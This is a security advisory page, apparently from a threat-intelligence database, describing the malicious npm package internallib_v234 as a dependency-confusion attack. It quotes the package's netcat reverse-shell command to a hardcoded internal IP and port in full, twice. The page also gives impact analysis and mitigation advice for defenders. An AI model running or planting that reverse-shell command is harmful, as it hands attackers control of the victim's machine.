Malicious code in internallib_v234 (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087) [email protected] exports a `command()` function whose body unconditionally invokes `/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"`, opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs `whereis nc` to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency (`internallib_v234: ^1.0.0`), and CI configuration references a private Verdaccio registry (`npm update --registry http://0.0.0.0:4873/`). The combination indicates a targeted attack against an organization that hosts a private `internallib_v234` internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.
AI Analysis
Technical Summary
The npm package internallib_v234 versions 1.0.3, 1.0.4, 1.0.5, 1.0.6, and 1.0.7 exports a command() function that unconditionally executes a reverse shell command using netcat to connect to a hardcoded RFC1918 IP address (10.0.74.133) on port 13337. Before launching the shell, it verifies netcat presence by running 'whereis nc'. The package exhibits dependency confusion characteristics by mimicking an internal library name, declaring itself as its own dependency, and referencing a private Verdaccio registry in CI configurations. This suggests a targeted attack aiming to trick organizations into installing this malicious public package instead of their internal one, resulting in remote shell access on the installer's host.
Potential Impact
If installed and the command() function is invoked, the malicious package opens an interactive reverse shell to an attacker-controlled internal IP address, potentially allowing unauthorized remote code execution and full control over the affected system. This compromises the confidentiality, integrity, and availability of the host machine. The attack relies on the presence of netcat and the invocation of the exported function, so impact depends on usage patterns within the targeted environment.
Mitigation Recommendations
No official patch or remediation is currently documented. Organizations should avoid installing or invoking the public internallib_v234 package versions 1.0.3 through 1.0.7. Verify and enforce usage of the legitimate internal package from private registries. Review CI configurations to prevent accidental installation from public npm registries. Monitor for unexpected network connections to internal IPs like 10.0.74.133 on port 13337. Patch status is not yet confirmed — check vendor advisories or trusted sources for updates.
Malicious code in internallib_v234 (npm)
Description
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087) [email protected] exports a `command()` function whose body unconditionally invokes `/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"`, opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs `whereis nc` to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency (`internallib_v234: ^1.0.0`), and CI configuration references a private Verdaccio registry (`npm update --registry http://0.0.0.0:4873/`). The combination indicates a targeted attack against an organization that hosts a private `internallib_v234` internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.
Affected software
Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The npm package internallib_v234 versions 1.0.3, 1.0.4, 1.0.5, 1.0.6, and 1.0.7 exports a command() function that unconditionally executes a reverse shell command using netcat to connect to a hardcoded RFC1918 IP address (10.0.74.133) on port 13337. Before launching the shell, it verifies netcat presence by running 'whereis nc'. The package exhibits dependency confusion characteristics by mimicking an internal library name, declaring itself as its own dependency, and referencing a private Verdaccio registry in CI configurations. This suggests a targeted attack aiming to trick organizations into installing this malicious public package instead of their internal one, resulting in remote shell access on the installer's host.
Potential Impact
If installed and the command() function is invoked, the malicious package opens an interactive reverse shell to an attacker-controlled internal IP address, potentially allowing unauthorized remote code execution and full control over the affected system. This compromises the confidentiality, integrity, and availability of the host machine. The attack relies on the presence of netcat and the invocation of the exported function, so impact depends on usage patterns within the targeted environment.
Mitigation Recommendations
No official patch or remediation is currently documented. Organizations should avoid installing or invoking the public internallib_v234 package versions 1.0.3 through 1.0.7. Verify and enforce usage of the legitimate internal package from private registries. Review CI configurations to prevent accidental installation from public npm registries. Monitor for unexpected network connections to internal IPs like 10.0.74.133 on port 13337. Patch status is not yet confirmed — check vendor advisories or trusted sources for updates.
Technical Details
- Gcve Source
- db.gcve.eu
- Osv Id
- MAL-2026-6796
- Osv Schema Version
- 1.7.4
- Aliases
- []
- Ecosystems
- ["npm"]
- Database Specific Severity
- null
- Cvss Version
- null
Threat ID: 6a4c346b27e9c79719601cc0
Added to database: 07/06/2026, 23:04:11 UTC
Last enriched: 07/06/2026, 23:23:25 UTC
Last updated: 07/29/2026, 20:14:43 UTC
Views: 26
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.